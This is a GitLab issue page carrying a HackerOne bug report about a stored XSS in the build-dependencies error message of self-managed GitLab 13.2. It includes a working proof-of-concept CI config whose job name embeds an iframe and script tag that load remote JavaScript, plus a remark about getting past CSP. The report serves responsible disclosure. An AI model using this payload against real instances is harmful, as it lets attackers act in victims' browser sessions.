You need to sign in or sign up before continuing.

Stored XSS on build dependencies

HackerOne report #950190 by yvvdwf on 2020-08-03, assigned to @jbroullon:

Hi,

A stored-XSS is existing in error message of build-dependencies. Fortunately it currently does not exist in gitlab.com. It seems that gitlab.com disables the dependencies validation. However this feature is enable by default in self-managed installation.

Steps to reproduce

The following steps should to be reproduced in a self-managed installation of gitlab

Create an empty project
Go to "Settings/CI/CD/Runners" to setup a runner for this project
Create new file .gitlab-ci.yml for this project using the following content:

test<iframe srcdoc='<script src=https://gitlab.com/yvvdwf/data/-/jobs/552156057/artifacts/raw/alert.js></script>'></iframe>:  
  stage: build  
  script:   
    - date > index.html  
  artifacts:  
    paths:   
      - index.html  
    expire_in: 1 second

job-test:  
  stage: test  
  script: echo "hi"  
  dependencies: ["test<iframe srcdoc='<script src=https://gitlab.com/yvvdwf/data/-/jobs/552156057/artifacts/raw/alert.js></script>'></iframe>"]

Wait for the jobs terminated, go to the detail of job-test
You should see an alert that contains the current url

Impact

Stored-XSS allow attackers to perform arbitrary actions on behalf of victims at client side.
Furthermore, by using <iframe> (detailed in #831962), the Stored-XSS can be fired in gitlab.com despite its CSP.

What is the current bug behavior?

The failure_message has been considered as safe

What is the expected correct behavior?

The failure_message should be sanitized.

Relevant logs and/or screenshots

Please see a screenshot in attached file

Output of checks

Results of GitLab environment info

(For installations with omnibus-gitlab package run and paste the output of:
sudo gitlab-rake gitlab:env:info)

System information  
System:		Ubuntu 18.04  
Proxy:		no  
Current User:	git  
Using RVM:	no  
Ruby Version:	2.6.6p146  
Gem Version:	2.7.10  
Bundler Version:1.17.3  
Rake Version:	12.3.3  
Redis Version:	5.0.9  
Git Version:	2.27.0  
Sidekiq Version:5.2.9  
Go Version:	unknown

GitLab information  
Version:	13.2.2-ee  
Revision:	618883a1f9d  
Directory:	/opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:	PostgreSQL  
DB Version:	11.7  
URL:		http://gl.local  
HTTP Clone URL:	http://gl.local/some-group/some-project.git  
SSH Clone URL:	git@gl.local:some-group/some-project.git  
Elasticsearch:	no  
Geo:		no  
Using LDAP:	no  
Using Omniauth:	yes  
Omniauth Providers: 

GitLab Shell  
Version:	13.3.0  
Repository storage paths:  
- default: 	/var/opt/gitlab/git-data/repositories  
GitLab Shell path:		/opt/gitlab/embedded/service/gitlab-shell  
Git:		/opt/gitlab/embedded/bin/git

Impact

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Screenshot_2020-08-03_at_14.50.32.png

Edited Oct 19, 2020 by Allison Browne